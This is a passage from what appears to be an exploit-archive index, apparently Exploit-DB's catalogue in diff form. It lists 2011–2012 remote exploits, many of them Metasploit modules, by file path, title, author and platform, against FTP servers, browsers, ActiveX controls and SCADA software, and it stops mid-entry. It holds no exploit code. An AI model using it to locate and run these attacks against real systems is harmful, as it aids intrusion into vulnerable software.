+17520,exploits/windows/remote/17520.rb,"Mozilla Firefox - 'nsTreeRange' Dangling Pointer (Metasploit) (1)",2011-07-10,Metasploit,remote,windows, +17527,exploits/windows/remote/17527.py,"Solar FTP Server 2.1.1 - PASV Buffer Overflow (PoC)",2011-07-12,"Craig Freyman",remote,windows, +17535,exploits/multiple/remote/17535.rb,"Java RMI - Server Insecure Default Configuration Java Code Execution (Metasploit)",2011-07-15,Metasploit,remote,multiple, +17537,exploits/windows/remote/17537.rb,"HP OpenView Network Node Manager (OV NNM) - 'Toolbar.exe' CGI Cookie Handling Buffer Overflow (Metasploit)",2011-07-16,Metasploit,remote,windows, +17539,exploits/windows/remote/17539.rb,"Freefloat FTP Server 1.0 - 'MKD' Remote Buffer Overflow",2011-07-17,"C4SS!0 G0M3S",remote,windows, +17540,exploits/windows/remote/17540.rb,"Freefloat FTP Server - 'MKD' Remote Buffer Overflow (Metasploit)",2011-07-18,"James Fitts",remote,windows, +17543,exploits/windows/remote/17543.rb,"Iconics GENESIS32 9.21.201.01 - Integer Overflow (Metasploit)",2011-07-17,Metasploit,remote,windows, +17546,exploits/windows/remote/17546.py,"Freefloat FTP Server 1.0 - 'REST' / 'PASV' Remote Buffer Overflow",2011-07-18,"C4SS!0 G0M3S",remote,windows, +17548,exploits/windows/remote/17548.rb,"Freefloat FTP Server - 'REST' Remote Buffer Overflow (Metasploit)",2011-07-19,KaHPeSeSe,remote,windows, +17550,exploits/windows/remote/17550.py,"Freefloat FTP Server 1.0 - 'ACCL' Remote Buffer Overflow",2011-07-19,mortis,remote,windows, +17557,exploits/windows/remote/17557.html,"Dell IT Assistant - detectIESettingsForITA.ocx ActiveX Control",2011-07-21,rgod,remote,windows, +17575,exploits/windows/remote/17575.txt,"Apple Safari 5.0.5 - SVG Remote Code Execution (DEP Bypass)",2011-07-26,Abysssec,remote,windows, +17578,exploits/windows/remote/17578.txt,"MinaliC WebServer 2.0 - Remote Source Disclosure",2011-07-27,X-h4ck,remote,windows, +17581,exploits/windows/remote/17581.txt,"MyWebServer 1.0.3 - Arbitrary File Download",2011-07-28,X-h4ck,remote,windows, +17588,exploits/windows/remote/17588.rb,"Actfax FTP Server 4.27 - USER Command Stack Buffer Overflow (Metasploit)",2011-07-31,mr_me,remote,windows, +17612,exploits/windows/remote/17612.rb,"Mozilla Firefox 3.6.16 - OBJECT mChannel Remote Code Execution (DEP Bypass) (Metasploit)",2011-08-05,Rh0,remote,windows, +17614,exploits/hp-ux/remote/17614.sh,"HP Data Protector (HP-UX) - Remote Shell",2011-08-05,"Adrian Puente Z.",remote,hp-ux, +17619,exploits/windows/remote/17619.py,"CiscoKits 1.0 - TFTP Server Directory Traversal",2011-08-05,"SecPod Research",remote,windows, +17635,exploits/hardware/remote/17635.rb,"HP JetDirect PJL - Interface Universal Directory Traversal (Metasploit)",2011-08-07,"Myo Soe",remote,hardware, +17636,exploits/hardware/remote/17636.rb,"HP JetDirect PJL - Query Execution (Metasploit)",2011-08-07,"Myo Soe",remote,hardware, +17645,exploits/hardware/remote/17645.py,"iphone/ipad phone drive 1.1.1 - Directory Traversal",2011-08-09,"Khashayar Fereidani",remote,hardware, +17648,exploits/linux/remote/17648.sh,"HP Data Protector (Linux) - Remote Command Execution",2011-08-10,SZ,remote,linux, +17649,exploits/windows/remote/17649.py,"BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow",2011-08-10,localh0t,remote,windows, +17650,exploits/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 (Windows) - mChannel Use-After-Free (Metasploit) (1)",2011-08-10,Metasploit,remote,windows, +17656,exploits/windows/remote/17656.rb,"TeeChart Professional ActiveX Control 2010.0.0.3 - Trusted Integer Dereference (Metasploit)",2011-08-11,Metasploit,remote,windows, +17659,exploits/windows/remote/17659.rb,"Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026) (Metasploit)",2011-08-13,Metasploit,remote,windows, +17670,exploits/hardware/remote/17670.py,"Sagem Router Fast 3304/3464/3504 - Telnet Authentication Bypass",2011-08-16,"Elouafiq Ali",remote,hardware, +17669,exploits/windows/remote/17669.py,"Simple HTTPd 1.42 - PUT Request Remote Buffer Overflow",2011-08-15,nion,remote,windows, +17672,exploits/windows/remote/17672.html,"Mozilla Firefox 3.6.16 (Windows 7) - mChannel Object Use-After-Free",2011-08-16,mr_me,remote,windows, +17691,exploits/multiple/remote/17691.rb,"Apache Struts < 2.2.0 - Remote Command Execution (Metasploit)",2011-08-19,Metasploit,remote,multiple, +17692,exploits/windows/remote/17692.rb,"Solar FTP Server 2.1.2 - PASV Buffer Overflow (Metasploit)",2011-08-19,Qnix,remote,windows, +17697,exploits/windows/remote/17697.rb,"HP Easy Printer Care - XMLSimpleAccessor Class ActiveX Control Remote Code Execution (Metasploit)",2011-08-20,Metasploit,remote,windows, +17699,exploits/windows/remote/17699.rb,"Symantec System Center Alert Management System - 'xfr.exe' Arbitrary Command Execution (Metasploit)",2011-08-19,Metasploit,remote,windows, +17700,exploits/windows/remote/17700.rb,"Symantec System Center Alert Management System - 'hndlrsvc.exe' Arbitrary Command Execution (Metasploit)",2011-08-19,Metasploit,remote,windows, +17719,exploits/windows/remote/17719.rb,"RealVNC - Authentication Bypass (Metasploit)",2011-08-26,Metasploit,remote,windows, +17721,exploits/windows/remote/17721.rb,"Sunway Force Control SCADA 6.1 SP3 - 'httpsrv.exe' Remote Overflow",2011-08-26,"Canberk BOLAT",remote,windows, +17762,exploits/windows/remote/17762.rb,"Citrix Gateway - ActiveX Control Stack Based Buffer Overflow (Metasploit)",2011-08-31,Metasploit,remote,windows, +17810,exploits/windows/remote/17810.rb,"BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow (Metasploit)",2011-09-09,"SecPod Research",remote,windows, +17819,exploits/windows/remote/17819.py,"KnFTP Server - Remote Buffer Overflow",2011-09-12,blake,remote,windows, +17827,exploits/windows/remote/17827.rb,"Procyon Core Server HMI 1.13 - 'Coreservice.exe' Remote Stack Buffer Overflow (Metasploit)",2011-09-12,Metasploit,remote,windows, +17848,exploits/windows/remote/17848.rb,"Measuresoft ScadaPro 4.0.0 - Remote Command Execution (Metasploit)",2011-09-16,Metasploit,remote,windows, +17849,exploits/windows/remote/17849.rb,"RealNetworks Realplayer - QCP Parsing Heap Overflow (Metasploit)",2011-09-17,Metasploit,remote,windows, +17855,exploits/windows/remote/17855.rb,"DaqFactory - HMI NETB Request Overflow (Metasploit)",2011-09-18,Metasploit,remote,windows, +17870,exploits/windows/remote/17870.pl,"KnFTP 1.0.0 Server - 'USER' Remote Buffer Overflow",2011-09-19,mr.pr0n,remote,windows, +17876,exploits/windows/remote/17876.py,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (1)",2011-09-20,modpr0be,remote,windows, +17883,exploits/hardware/remote/17883.txt,"Blue Coat Reporter - Unauthenticated Directory Traversal",2011-09-22,nitr0us,remote,hardware, +17884,exploits/windows/remote/17884.py,"Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow",2011-09-22,mr_me,remote,windows, +17886,exploits/windows/remote/17886.py,"Freefloat FTP Server - Remote Buffer Overflow (DEP Bypass)",2011-09-23,blake,remote,windows, +17904,exploits/windows/remote/17904.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (Metasploit)",2011-09-29,otoy,remote,windows, +17936,exploits/windows/remote/17936.rb,"Opera 10/11 - Bad Nesting with Frameset Tag Memory Corruption (Metasploit)",2011-10-06,"Jose A. Vazquez",remote,windows, +17948,exploits/windows/remote/17948.rb,"ScriptFTP 3.3 - LIST Remote Buffer Overflow (Metasploit) (2)",2011-10-09,Metasploit,remote,windows, +17969,exploits/multiple/remote/17969.py,"Apache mod_proxy - Reverse Proxy Exposure (PoC)",2011-10-11,"Rodrigo Marcos",remote,multiple, +17960,exploits/windows/remote/17960.rb,"Opera Browser 10/11/12 - 'SVG Layout' Memory Corruption (Metasploit)",2011-10-10,"Jose A. Vazquez",remote,windows, +17974,exploits/windows/remote/17974.html,"Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (1)",2011-10-12,ryujin,remote,windows, +17975,exploits/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()'/'SaveObject()' Trusted DWORD (Metasploit)",2011-10-12,Metasploit,remote,windows, +17976,exploits/windows/remote/17976.rb,"Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (Metasploit) (2)",2011-10-13,Metasploit,remote,windows, +17977,exploits/windows/remote/17977.txt,"JBoss AS 2.0 - Remote Command Execution",2011-10-11,kingcope,remote,windows, +17986,exploits/osx/remote/17986.rb,"Apple Safari - 'file://' Arbitrary Code Execution (Metasploit)",2011-10-17,Metasploit,remote,osx, +17993,exploits/windows/remote/17993.rb,"Apple Safari Webkit - libxslt Arbitrary File Creation (Metasploit)",2011-10-18,Metasploit,remote,windows, +18015,exploits/cgi/remote/18015.rb,"HP Power Manager - 'formExportDataLogs' Remote Buffer Overflow (Metasploit)",2011-10-20,Metasploit,remote,cgi, +18016,exploits/windows/remote/18016.txt,"Oracle AutoVue 20.0.1 AutoVueX - ActiveX Control SaveViewStateToFile",2011-10-21,rgod,remote,windows, +18051,exploits/windows/remote/18051.txt,"BroadWin Webaccess SCADA/HMI Client - Remote Code Execution",2011-10-31,Snake,remote,windows, +18057,exploits/windows/remote/18057.rb,"NJStar Communicator 3.00 - MiniSMTP Server Remote (Metasploit)",2011-10-31,"Dillon Beresford",remote,windows, +18062,exploits/windows/remote/18062.txt,"Oracle Hyperion Financial Management TList6 - ActiveX Control Remote Code Execution",2011-11-02,rgod,remote,windows, +18079,exploits/hardware/remote/18079.pl,"DreamBox DM800 1.5rc1 - File Disclosure",2011-11-04,"Todor Donev",remote,hardware, +18089,exploits/windows/remote/18089.rb,"KnFTP 1.0 - Remote Buffer Overflow (DEP Bypass) (Metasploit)",2011-11-07,pasta,remote,windows, +18092,exploits/windows/remote/18092.html,"Oracle Hyperion Strategic Finance 12.x - Tidestone Formula One WorkBook OLE Control TTF16.ocx Remote Heap Overflow",2011-11-07,rgod,remote,windows, +18093,exploits/windows/remote/18093.txt,"Oracle - xdb.xdb_pitrig_pkg.PITRIG_DROPMETADATA procedure",2011-11-07,"David Maman",remote,windows, +18102,exploits/windows/remote/18102.rb,"AbsoluteFTP 1.9.6 < 2.2.10 - 'LIST' Remote Buffer Overflow (Metasploit)",2011-11-09,Node,remote,windows, +18123,exploits/windows/remote/18123.rb,"Viscom Image Viewer CP Pro 8.0/Gold 6.0 - ActiveX Control (Metasploit)",2011-11-17,Metasploit,remote,windows, +18125,exploits/windows/remote/18125.rb,"Wireshark - console.lua pre-loading (Metasploit)",2011-11-19,Metasploit,remote,windows, +18134,exploits/windows/remote/18134.rb,"Viscom Software Movie Player Pro SDK ActiveX 6.8 - Stack-Based Buffer Overflow (Metasploit)",2011-11-20,Metasploit,remote,windows, +18138,exploits/windows/remote/18138.txt,"VMware - Update Manager Directory Traversal",2011-11-21,"Alexey Sintsov",remote,windows, +18145,exploits/linux/remote/18145.py,"Wireshark 1.4.4 - DECT Dissector Remote Buffer Overflow",2011-11-22,ipv,remote,linux, +18171,exploits/multiple/remote/18171.rb,"Java Applet Rhino Script Engine - Remote Code Execution (Metasploit)",2011-11-30,Metasploit,remote,multiple, +18172,exploits/hardware/remote/18172.rb,"CTEK SkyRouter 4200/4300 - Command Execution (Metasploit)",2011-11-30,Metasploit,remote,hardware, +18179,exploits/jsp/remote/18179.html,"IBM Lotus Domino Server Controller - Authentication Bypass",2011-11-30,"Alexey Sintsov",remote,jsp, +18181,exploits/freebsd/remote/18181.txt,"FreeBSD - 'ftpd / ProFTPd' Remote Command Execution",2011-12-01,kingcope,remote,freebsd, +18182,exploits/windows/remote/18182.txt,"Serv-U FTP Server - Jail Break",2011-12-01,kingcope,remote,windows, +18183,exploits/windows/remote/18183.rb,"AVID Media Composer Phonetic Indexer - Remote Stack Buffer Overflow (Metasploit)",2011-12-01,"Nick Freeman",remote,windows, +18187,exploits/windows/remote/18187.c,"CoDeSys SCADA 2.3 - Remote Buffer Overflow",2011-12-01,"Celil Ünüver",remote,windows, +18189,exploits/windows/remote/18189.txt,"Ipswitch TFTP Server 1.0.0.24 - Directory Traversal",2011-12-02,"SecPod Research",remote,windows, +18190,exploits/windows/remote/18190.rb,"RhinoSoft Serv-U FTPd Server < 4.2 - Remote Buffer Overflow (Metasploit)",2011-12-02,Metasploit,remote,windows, +18235,exploits/windows/remote/18235.pl,"zFTPServer Suite 6.0.0.52 - 'rmdir' Directory Traversal",2011-12-11,"Stefan Schurtz",remote,windows, +18240,exploits/windows/remote/18240.rb,"CoDeSys SCADA 2.3 - WebServer Stack Buffer Overflow (Metasploit)",2011-12-13,Metasploit,remote,windows, +18280,exploits/linux/remote/18280.c,"TelnetD encrypt_keyid - Function Pointer Overwrite",2011-12-26,"NighterMan & BatchDrake",remote,linux, +18283,exploits/windows/remote/18283.rb,"CoCSoft Stream Down 6.8.0 - Universal (Metasploit)",2011-12-27,"Fady Mohammed Osman",remote,windows, +18291,exploits/hardware/remote/18291.txt,"Reaver - WiFi Protected Setup (WPS)",2011-12-30,cheffner,remote,hardware, +18984,exploits/multiple/remote/18984.rb,"Apache Struts 2.2.1.1 - Remote Command Execution (Metasploit)",2012-06-05,Metasploit,remote,multiple, +18345,exploits/windows/remote/18345.py,"TFTP Server 1.4 - ST 'RRQ' Remote Buffer Overflow",2012-01-10,b33f,remote,windows, +18354,exploits/windows/remote/18354.py,"WorldMail IMAPd 3.0 - Remote Overflow (SEH) (Egghunter)",2012-01-12,TheXero,remote,windows, +18376,exploits/windows/remote/18376.rb,"McAfee SaaS MyCioScan ShowReport - Remote Command Execution (Metasploit)",2012-01-17,Metasploit,remote,windows, +18365,exploits/windows/remote/18365.rb,"Microsoft Internet Explorer - JavaScript OnLoad Handler Remote Code Execution (MS05-054) (Metasploit)",2012-01-14,Metasploit,remote,windows, +18367,exploits/windows/remote/18367.rb,"XAMPP - WebDAV PHP Upload (Metasploit)",2012-01-14,Metasploit,remote,windows, +18368,exploits/linux/remote/18368.rb,"Linux BSD-derived Telnet Service Encryption Key ID - Remote Buffer Overflow (Metasploit)",2012-01-14,Metasploit,remote,linux, +18369,exploits/bsd/remote/18369.rb,"FreeBSD - Telnet Service Encryption Key ID Buffer Overflow (Metasploit)",2012-01-14,Metasploit,remote,bsd, +18377,exploits/osx/remote/18377.rb,"Mozilla Firefox 3.6.16 (OSX) - mChannel Use-After-Free (Metasploit) (2)",2012-01-17,Metasploit,remote,osx, +18381,exploits/windows/remote/18381.rb,"HP Easy Printer Care - XMLCacheMgr Class ActiveX Control Remote Code Execution (Metasploit)",2012-01-18,Metasploit,remote,windows, +18382,exploits/windows/remote/18382.py,"Sysax Multi Server 5.50 - Create Folder Buffer Overflow",2012-01-18,"Craig Freyman",remote,windows, +18388,exploits/windows/remote/18388.rb,"HP OpenView Network Node Manager - 'ov.dll' _OVBuildPath Buffer Overflow (Metasploit)",2012-01-20,Metasploit,remote,windows, +18393,exploits/linux/remote/18393.rb,"Gitorious - Arbitrary Command Execution (Metasploit)",2012-01-20,Metasploit,remote,linux, +18397,exploits/windows/remote/18397.py,"Avaya WinPDM UniteHostRouter 3.8.2 - Remote Unauthenticated Command Execution",2012-01-20,Abysssec,remote,windows, +18401,exploits/windows/remote/18401.py,"Savant Web Server 3.1 - Remote Buffer Overflow (Egghunter)",2012-01-21,red-dragon,remote,windows, +18697,exploits/windows/remote/18697.rb,"NetOp Remote Control Client 9.5 - Remote Buffer Overflow (Metasploit)",2012-04-04,Metasploit,remote,windows, +18420,exploits/windows/remote/18420.rb,"Sysax Multi Server 5.50 - Create Folder Remote Code Execution Buffer Overflow (Metasploit)",2012-01-26,"Craig Freyman",remote,windows, +18423,exploits/windows/remote/18423.rb,"HP Diagnostics Server - 'magentservice.exe' Remote Overflow (Metasploit)",2012-01-27,Metasploit,remote,windows, +18426,exploits/windows/remote/18426.rb,"Microsoft Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004) (Metasploit)",2012-01-28,Metasploit,remote,windows, +18437,exploits/windows/remote/18437.txt,"Adobe Flash Player - MP4 SequenceParameterSetNALUnit Remote Code Execution",2012-01-31,Abysssec,remote,windows, +18442,exploits/multiple/remote/18442.html,"Apache - httpOnly Cookie Disclosure",2012-01-31,pilate,remote,multiple, +18446,exploits/android/remote/18446.html,"Webkit Normalize Bug - Android 2.2",2012-02-01,"MJ Keith",remote,android, +18448,exploits/windows/remote/18448.rb,"Sunway ForceControl - SNMP 'NetDBServer.exe' Opcode 0x57 (Metasploit)",2012-02-02,Metasploit,remote,windows, +18449,exploits/windows/remote/18449.rb,"Icona SpA C6 Messenger - DownloaderActiveX Control Arbitrary File Download and Execute (Metasploit)",2012-02-02,Metasploit,remote,windows, +18476,exploits/windows/remote/18476.py,"Sysax Multi Server 5.52 - File Rename Buffer Overflow Remote Code Execution (Egghunter)",2012-02-09,"Craig Freyman",remote,windows, +18478,exploits/windows/remote/18478.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020000 Buffer Overflow (Metasploit)",2012-02-10,Metasploit,remote,windows, +18479,exploits/windows/remote/18479.rb,"Adobe Flash Player - MP4 SequenceParameterSetNALUnit Buffer Overflow (Metasploit)",2012-02-10,Metasploit,remote,windows, +18485,exploits/windows/remote/18485.rb,"Java MixerSequencer Object - GM_Song Structure Handling (Metasploit)",2012-02-16,Metasploit,remote,windows, +18492,exploits/linux/remote/18492.rb,"Horde 3.3.12 - Backdoor Arbitrary PHP Code Execution (Metasploit)",2012-02-17,Metasploit,remote,linux, +18520,exploits/windows/remote/18520.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (2012) (Metasploit)",2012-02-24,Metasploit,remote,windows, +18514,exploits/windows/remote/18514.rb,"Trend Micro Control Manger 5.5 - 'CmdProcessor.exe' Remote Stack Buffer Overflow (Metasploit)",2012-02-23,Metasploit,remote,windows, +18521,exploits/windows/remote/18521.rb,"HP Data Protector 6.1 - EXEC_CMD Remote Code Execution (Metasploit)",2012-02-25,Metasploit,remote,windows, +18531,exploits/windows/remote/18531.html,"Mozilla Firefox 4.0.1 - 'Array.reduceRight()' Remote Overflow",2012-02-27,pa_kt,remote,windows, +18534,exploits/windows/remote/18534.py,"Sysax Multi Server 5.53 - SFTP Authenticated (SEH)",2012-02-27,"Craig Freyman",remote,windows, +18535,exploits/windows/remote/18535.py,"Sysax 5.53 - SSH 'Username' Remote Buffer Overflow Unauthenticated Remote Code Execution (Egghunter)",2012-02-27,"Craig Freyman",remote,windows, +18538,exploits/windows/remote/18538.rb,"ASUS Net4Switch - 'ipswcom.dll' ActiveX Stack Buffer Overflow (Metasploit)",2012-02-29,Metasploit,remote,windows, +18539,exploits/windows/remote/18539.rb,"IBM Personal Communications I-Series Access Workstation 5.9 - Profile (Metasploit)",2012-02-29,Metasploit,remote,windows, +18542,exploits/windows/remote/18542.txt,"Netmechanica NetDecision Traffic Grapher Server - Information Disclosure",2012-02-29,"SecPod Research",remote,windows, +18543,exploits/windows/remote/18543.py,"Netmechanica NetDecision Dashboard Server - Information Disclosure",2012-02-29,"SecPod Research",remote,windows, +18565,exploits/php/remote/18565.rb,"LotusCMS 3.0 - 'eval()' Remote Command Execution (Metasploit)",2012-03-07,Metasploit,remote,php, +18555,exploits/windows/remote/18555.txt,"FlashFXP 4.1.8.1701 - Remote Buffer Overflow",2012-03-03,Vulnerability-Lab,remote,windows, +18557,exploits/windows/remote/18557.rb,"Sysax 5.53 - SSH 'Username' Remote Buffer Overflow (Metasploit)",2012-03-04,Metasploit,remote,windows, +18703,exploits/windows/remote/18703.txt,"Quest Toad for Oracle Explain Plan Display ActiveX Control - 'QExplain2.dll 6.6.1.1115' Remote File Creation / Overwrite (PoC)",2012-04-05,rgod,remote,windows, +18572,exploits/windows/remote/18572.rb,"Adobe Flash Player - '.mp4 cprt' Remote Overflow (Metasploit)",2012-03-08,Metasploit,remote,windows, +18619,exploits/multiple/remote/18619.txt,"Apache Tomcat - Account Scanner / 'PUT' Request Command Execution",2012-03-19,kingcope,remote,multiple, +18604,exploits/windows/remote/18604.rb,"Netmechanica NetDecision HTTP Server 4.5.1 - Remote Buffer Overflow (Metasploit)",2012-03-15,Metasploit,remote,windows, +18610,exploits/windows/remote/18610.pl,"Tiny Server 1.1.5 - Arbitrary File Disclosure",2012-03-16,KaHPeSeSe,remote,windows, +18704,exploits/windows/remote/18704.txt,"Quest vWorkspace 7.5 Connection Broker Client - ActiveX Control 'pnllmcli.dll 7.5.304.547' SaveMiniLaunchFile() Method Remote File Creation / Overwrite (PoC)",2012-04-05,rgod,remote,windows, +18621,exploits/windows/remote/18621.txt,"Dell Webcam Software Bundled - ActiveX Remote Buffer Overflow",2012-03-19,rgod,remote,windows, +18622,exploits/windows/remote/18622.txt,"LANDesk Lenovo ThinkManagement Suite 9.0.3 - Core Server Remote Code Execution",2012-03-19,rgod,remote,windows, +18623,exploits/windows/remote/18623.txt,"LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server - Arbitrary File Deletion",2012-03-19,rgod,remote,windows, +18624,exploits/windows/remote/18624.txt,"2X Client for RDP 10.1.1204 - ClientSystem Class ActiveX Control Download and Execute",2012-03-19,rgod,remote,windows, +18625,exploits/windows/remote/18625.txt,"2X ApplicationServer 10.1 - TuxSystem Class ActiveX Control Remote File Overwrite",2012-03-19,rgod,remote,windows, +18634,exploits/windows/remote/18634.rb,"Dell Webcam CrazyTalk - ActiveX BackImage (Metasploit)",2012-03-21,Metasploit,remote,windows, +18640,exploits/windows/remote/18640.txt,"Google Talk - 'gtalk://' Deprecated URI Handler Injection",2012-03-22,rgod,remote,windows, +18642,exploits/windows/remote/18642.rb,"Microsoft Internet Explorer - Object Memory Use-After-Free (MS10-002) (Metasploit)",2012-03-22,Metasploit,remote,windows, +18695,exploits/windows/remote/18695.py,"Sysax 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",remote,windows, +18658,exploits/windows/remote/18658.rb,"Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) - FTP USER Command Buffer Overflow (Metasploit)",2012-03-24,Metasploit,remote,windows, +18666,exploits/windows/remote/18666.rb,"UltraVNC 1.0.2 Client - 'vncviewer.exe' Remote Buffer Overflow (Metasploit)",2012-03-26,Metasploit,remote,windows, +18672,exploits/windows/remote/18672.txt,"Quest InTrust 10.4.x - ReportTree / SimpleTree Classes",2012-03-28,rgod,remote,windows, +18673,exploits/hardware/remote/18673.txt,"D-Link DCS-5605 Network Surveillance - ActiveX Control 'DcsCliCtrl.dll' lstrcpyW Remote Buffer Overflow",2012-03-28,rgod,remote,hardware, +18674,exploits/windows/remote/18674.txt,"Quest InTrust 10.4.x - Annotation Objects ActiveX Control 'AnnotateX.dll' Uninitialized Pointer Remote Code Execution",2012-03-28,rgod,remote,windows, +18675,exploits/hardware/remote/18675.txt,"TRENDnet SecurView TV-IP121WN Wireless Internet Camera - UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow",2012-03-28,rgod,remote,hardware, +18679,exploits/multiple/remote/18679.rb,"Java - AtomicReferenceArray Type Violation (Metasploit)",2012-03-30,Metasploit,remote,multiple, +18683,exploits/windows/remote/18683.py,"MailMax 4.6 - POP3 'USER' Unauthenticated Remote Buffer Overflow",2012-03-30,localh0t,remote,windows, +18709,exploits/windows/remote/18709.rb,"TRENDnet SecurView Internet Camera - UltraMJCam OpenFileDlg Buffer Overflow (Metasploit)",2012-04-06,Metasploit,remote,windows, +18714,exploits/windows/remote/18714.rb,"LANDesk Lenovo ThinkManagement Console - Remote Command Execution (Metasploit)",2012-04-08,Metasploit,remote,windows, +18718,exploits/windows/remote/18718.txt,"Distinct TFTP Server 3.01 - Directory Traversal",2012-04-08,modpr0be,remote,windows, +18723,exploits/multiple/remote/18723.rb,"Snort 2 - DCE/RPC Preprocessor Buffer Overflow (Metasploit)",2012-04-09,Metasploit,remote,multiple, +18727,exploits/windows/remote/18727.rb,"IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 - ActiveX RunAndUploadFile() Method Overflow (Metasploit)",2012-04-10,Metasploit,remote,windows, +18735,exploits/windows/remote/18735.rb,"Quest InTrust - Annotation Objects Uninitialized Pointer (Metasploit)",2012-04-13,Metasploit,remote,windows, +18738,exploits/php/remote/18738.rb,"V-CMS - Arbitrary '.PHP' File Upload / Execution (Metasploit)",2012-04-14,Metasploit,remote,php, +18759,exploits/windows/remote/18759.rb,"TFTP Server 1.4 - ST WRQ Buffer Overflow (Metasploit)",2012-04-20,Metasploit,remote,windows, +18761,exploits/linux/remote/18761.rb,"Adobe Flash Player - ActionScript Launch Command Execution (Metasploit)",2012-04-20,Metasploit,remote,linux, +18763,exploits/multiple/remote/18763.txt,"Liferay 6.0.x - WebDAV File Reading",2012-04-22,"Jelmer Kuperus",remote,multiple, +18780,exploits/windows/remote/18780.rb,"Microsoft Windows - MSCOMCTL ActiveX Buffer Overflow (MS12-027) (Metasploit)",2012-04-25,Metasploit,remote,windows, +18779,exploits/hardware/remote/18779.txt,"RuggedCom Devices - Backdoor Access",2012-04-24,jc,remote,hardware, +18833,exploits/windows/remote/18833.rb,"SolarWinds Storage Manager 5.1.0 - SQL Injection (Metasploit)",2012-05-04,Metasploit,remote,windows, +18805,exploits/windows/remote/18805.txt,"McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX 'GetObject()' Code Execution",2012-04-30,rgod,remote,windows, +18812,exploits/windows/remote/18812.rb,"McAfee Virtual Technician MVTControl 6.3.0.1911 - GetObject (Metasploit)",2012-05-01,Metasploit,remote,windows, +18818,exploits/windows/remote/18818.py,"SolarWinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection",2012-05-01,muts,remote,windows, +18825,exploits/windows/remote/18825.rb,"VideoLAN VLC Media Player 2.0.0 - Mms Stream Handling Buffer Overflow (Metasploit)",2012-05-03,Metasploit,remote,windows, +18834,exploits/php/remote/18834.rb,"PHP 5.3.12/5.4.2 - CGI Argument Injection (Metasploit)",2012-05-04,Metasploit,remote,php, +18836,exploits/php/remote/18836.py,"PHP < 5.3.12 / < 5.4.2 - CGI Argument Injection",2012-05-05,rayh4c,remote,php, +18847,exploits/windows/remote/18847.rb,"Mozilla Firefox 7 / 8 < 8.0.1 - nsSVGValue Out-of-Bounds Access (Metasploit)",2012-05-09,Metasploit,remote,windows, +18866,exploits/windows/remote/18866.rb,"Distinct TFTP 3.01 - Writable Directory Traversal Execution (Metasploit)",2012-05-12,Metasploit,remote,windows, +18870,exploits/windows/remote/18870.rb,"Mozilla Firefox 8/9 - 'AttributeChildRemoved()' Use-After-Free (Metasploit)",2012-05-13,Metasploit,remote,windows, +18896,exploits/multiple/remote/18896.rb,"Squiggle 1.7 - SVG Browser Java Code Execution (Metasploit)",2012-05-19,Metasploit,remote,multiple, +18893,exploits/hardware/remote/18893.py,"HP VSA - Remote Command Execution",2012-02-17,"Nicolas Gregoire",remote,hardware, +18898,exploits/php/remote/18898.rb,"Active Collab 'chat module' < 2.3.8 - Remote PHP Code Injection (Metasploit)",2012-05-19,Metasploit,remote,php, +18897,exploits/windows/remote/18897.rb,"Oracle Weblogic Apache Connector - POST Buffer Overflow (Metasploit)",2012-05-19,Metasploit,remote,windows, +18901,exploits/hardware/remote/18901.rb,"HP StorageWorks P4000 - Virtual SAN Appliance Command Execution (Metasploit)",2012-05-21,Metasploit,remote,hardware, +18915,exploits/windows/remote/18915.rb,"FlexNet License Server Manager - lmgrd Buffer Overflow (Metasploit)",2012-05-23,Metasploit,remote,windows, +18929,exploits/windows/remote/18929.rb,"RabidHamster R4 - Log Entry 'sprintf()' Remote Buffer Overflow (Metasploit)",2012-05-25,Metasploit,remote,windows, +18933,exploits/windows/remote/18933.rb,"quickshare file share 1.2.1 - Directory Traversal (Metasploit) (2)",2012-05-27,Metasploit,remote,windows, +18942,exploits/linux/remote/18942.rb,"Symantec Web Gateway 5.0.2.8 - Command Execution (Metasploit)",2012-05-28,Metasploit,remote,linux, +19025,exploits/windows/remote/19025.rb,"Sielco Sistemi Winlog 2.07.14 - Remote Buffer Overflow (Metasploit)",2012-06-08,Metasploit,remote,windows, +18967,exploits/windows/remote/18967.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020004 Buffer Overflow (Metasploit)",2012-06-01,Metasploit,remote,windows, +18968,exploits/windows/remote/18968.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020006 Buffer Overflow (Metasploit)",2012-06-01,Metasploit,remote,windows, +18969,exploits/windows/remote/18969.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020002 Buffer Overflow (Metasploit)",2012-06-01,Metasploit,remote,windows, +18973,exploits/windows/remote/18973.rb,"GIMP script-fu - Server Buffer Overflow (Metasploit)",2012-06-02,Metasploit,remote,windows, +18986,exploits/windows/remote/18986.rb,"Sielco Sistemi Winlog 2.07.16 - Remote Buffer Overflow",2012-06-05,m-1-k-3,remote,windows, +19027,exploits/windows/remote/19027.rb,"Samsung NET-i viewer - Multiple ActiveX 'BackupToAvi()' Remote Overflows (Metasploit)",2012-06-08,Metasploit,remote,windows, +19026,exploits/windows/remote/19026.rb,"Microsoft IIS - MDAC 'msadcs.dll' RDS DataStub Content-Type Overflow (MS02-065) (Metasploit)",2012-06-08,Metasploit,remote,windows, +19002,exploits/windows/remote/19002.rb,"Microsoft Windows - OLE Object File Handling Remote Code Execution (Metasploit)",2012-06-06,Metasploit,remote,windows, +19030,exploits/windows/remote/19030.rb,"Tom Sawyer Software GET Extension Factory - Remote Code Execution 